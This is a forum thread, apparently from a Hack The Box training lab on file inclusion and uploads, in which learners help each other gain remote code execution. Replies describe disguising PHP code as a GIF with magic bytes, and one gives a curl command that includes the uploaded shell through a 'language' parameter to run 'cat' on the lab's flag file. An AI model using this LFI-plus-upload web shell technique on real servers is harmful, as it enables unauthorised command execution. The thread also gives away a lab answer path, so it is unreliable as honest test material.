[File Inclusion][LFI and File Uploads]

hey guys.can some one help me for this question?
Use any of the techniques covered in this section to gain RCE and read the flag at /
i go to this http://159.65.81.40:30186/settings.php url and it just give me file not allowed error when i click on upload.i saw requests with burp and this is the post request after click on upload bottom.can somebody help me please?

POST /upload.php HTTP/1.1

Host: 159.65.81.40:30186

Content-Length: 150

Accept: */*

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXGg68SiXvWXYKlUF

Origin: http://159.65.81.40:30186

Referer: http://159.65.81.40:30186/settings.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close



------WebKitFormBoundaryXGg68SiXvWXYKlUF

Content-Disposition: form-data; name="uploadFile"



undefined

------WebKitFormBoundaryXGg68SiXvWXYKlUF--

You have to create the code and save it as a gif, upload the file, and then execute it. In the end, where it says =id, you can keep changing to search for the file path.

Hi, I’m also having trouble with this, I did just as the section said and created a code and saved it as a gif, when I uploaded it, it worked and it did show id. When I list the / directory I also found a txt file, which contains the string “GIF8” in it, unfortunately, it is not the answer to the question. I’m really stuck and don’t know what to do

1 Like

The file has the magic bytes prefixing it. drop the GIF8 and cat the file

curl -s "http://<SERVER>:<PORT>/index.php?language=./profile_images/shell.gif&cmd=cat+/2f40d853e2d4768d87da1c81772bae0a.txt" | grep HTB

3 Likes

Thank you so much, the magic bytes prefixing part is where it stumped me, and I’m not that good with curl, thankyou so much for the help.

1 Like